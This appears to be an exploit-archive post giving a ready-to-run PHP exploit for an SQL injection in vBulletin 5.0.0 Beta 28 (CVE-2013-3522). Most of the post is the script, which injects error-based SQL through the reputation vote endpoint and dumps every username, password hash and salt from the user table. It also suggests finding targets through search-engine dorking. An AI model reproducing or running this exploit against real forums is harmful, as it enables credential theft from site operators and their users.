=============================================================================================================================================
| # Title     : vBulletin 5.0.0 Beta 28 SQL Injection vulnerability                                                                         |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
| # Vendor    : https://www.vbulletin.com/                                                                                                  |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] Code Description: SQL Injection Vulnerability in vBulletin 5 Extracts Usernames and Encrypted Data

   (Related : https://packetstorm.news/files/id/180631/ Linked CVE numbers: CVE-2013-3522 ) .
	
[+] save code as poc.php.

[+] Set target : line 70

[+] PayLoad :

<?php

class VBulletinSQLiExploit {
    private $target;
    private $minNode;
    private $maxNode;

    public function __construct($target, $minNode = 1, $maxNode = 100) {
        $this->target = rtrim($target, '/');
        $this->minNode = $minNode;
        $this->maxNode = $maxNode;
    }

    private function sendRequest($data) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, "$this->target/index.php/ajax/api/reputation/vote");
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        $response = curl_exec($ch);
        curl_close($ch);
        return $response;
    }

    private function doSQLi($node, $query) {
        $mark = bin2hex(random_bytes(4));
        $injection = ") AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT CONCAT('$mark', ($query), '$mark') FROM information_schema.tables LIMIT 1), FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x) a) -- ";
        
        $data = ['nodeid' => "$node$injection"];
        $res = $this->sendRequest($data);
        
        if (strpos($res, "Database error in vBulletin") !== false && preg_match("/$mark(.*?)$mark/", $res, $matches)) {
            return $matches[1];
        }
        return null;
    }

    private function existsNode($id) {
        return $this->doSQLi($id, "SELECT '1'") !== null;
    }

    private function findValidNode() {
        for ($i = $this->minNode; $i <= $this->maxNode; $i++) {
            if ($this->existsNode($i)) return $i;
        }
        return null;
    }

    public function exploit() {
        echo "[+] Searching for a valid node...\n";
        $node = $this->findValidNode();
        if (!$node) {
            echo "[-] No valid node found.\n";
            return;
        }
        echo "[+] Using Node ID: $node\n";

        $userCount = $this->doSQLi($node, "SELECT COUNT(*) FROM user");
        echo "[+] Found $userCount users.\n";

        for ($i = 0; $i < $userCount; $i++) {
            $username = $this->doSQLi($node, "SELECT username FROM user LIMIT $i,1");
            $password = $this->doSQLi($node, "SELECT password FROM user LIMIT $i,1");
            $salt = $this->doSQLi($node, "SELECT salt FROM user LIMIT $i,1");
            echo "[*] User: $username | Hash: $password | Salt: $salt\n";
        }
    }
}

$exploit = new VBulletinSQLiExploit("http://target.com");
$exploit->exploit();





Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================